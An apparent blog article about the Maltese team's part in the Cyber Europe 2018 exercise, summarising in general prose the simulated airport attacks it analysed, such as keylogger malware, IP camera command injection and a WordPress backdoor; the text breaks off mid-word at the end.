Get prepared for the next cyber
It is a normal day at the airport. Suddenly, the automated check-in machines display a system failure. Travel apps stop working and the agents at the check-in counters cannot operate their computers. Travellers can neither check in their luggage, nor pass through security. Huge queues of people start gathering, while all the airport monitors are showing that all flights have been cancelled. Baggages cannot be claimed and more than half of the flights cannot take off.
A radical group has hacked the airport’s critical systems using digital and hybrid attacks. They have claimed responsibility for this attack and are using their channels to instigate more people to adopt their radical ideology.
This was the scenario that over 900 European cybersecurity specialists from 30 countries had to face on 6th and 7th June, during Cyber Europe 2018. MITA was part of the Maltese team that participated in the international cybersecurity simulation exercise organised by ENISA. In all, in Malta there were 50 local cyber security and media professionals from 11 organisations who participated in this event. This exercise was coordinated by the Critical Infrastructure Protection Directorate and Malta’s National Computer Security Incident Response Team (CSIRTMalta).
The Maltese team was organised in multiple cells established at various locations. The national coordinating cell, which included a media crisis cell was located at the Ministry for Home Affairs and National Security, while an operational crisis cell was gathered at MITA’s Data Centre. Another cell was established at the Malta International Airport, from where both Air Malta and the airport teams were coordinating their work.
To prepare for this event, MITA set up a laboratory consisting of five machines and which included two physical Windows test machines, two physical Linux test machines and another Linux virtual machine. These machines were equipped with several forensic and malware analysis tools and were connected to a segregated network.
Many technical lessons learnt
One of the incidents handled successfully by the team was an executable file which could have been easily sent to potential victims via email or could have been downloaded from a rogue website. This executable file was in the form of malware acting as a dropper, keylogger and exfiltrator. The malware captures key strikes and, the one in question could capture up to 10,000 key strikes on the infected machine. Through key strikes, the attacker possibly captured sensitive information such as passwords and credit card numbers. Moreover, the malware exfiltrated files located on the victims’ desktop using POST request to a range of URLs. An updated version of the malware was later released, making use of persistent mechanisms and advanced anti-forensic techniques deployed to stay undetected. This malware was more complicated to analyse, since we had to use only specific tools.
As part of the simulation, a cyber-attack was also launched against airport IP cameras. A packet capture of the network traffic generated by the IP cameras was presented to the team for further analysis. By delving further into it, the team could detect that the infected IP camera within the closed network had tried to infect other IP cameras through command injection vulnerability in their web interface. The attacker exploited the command injection vulnerability and which as a result installed the same version of malware on each target device. This malware infected all the airport IP cameras and bricked them, turning them “blind” to any physical attack.
Another incident was on an internal Wordpress site, where the team was presented with an image of the virtual machine hosting the site. It was determined that this attack utilised a Wordpress SQL injection vulnerability and had retrieved the user and password hashes for all users. The attacker could easily identify the accounts, which were configured as Administrator using tools such as WPScan. The attacker managed to crack passwords since they were stored hashed using a weak algorithm. Then, the attacker logged into the Administration Section with the Administrator account and opened a back-door on the site. The backdoor that the team tested and worked on was a PHP reverse shell that was inserted in one of the files of the Wordpress theme. Additionally, we also identified that the attacker managed to recreate the client-side exploit by dynamically recreating it from stored images.
Some other incidents that were handled included Ransomware in airport automation systems and ticketing kiosks, DLL injection on electricity control systems, Malicious drone navigations apps, Office hacking with smart devices and Memchached DDoS attacks.
It was a great experience from which we have improved as a team not only from a technical perspective, but also in the cooperation between the public and private sectors, where we were able to share knowledge and les-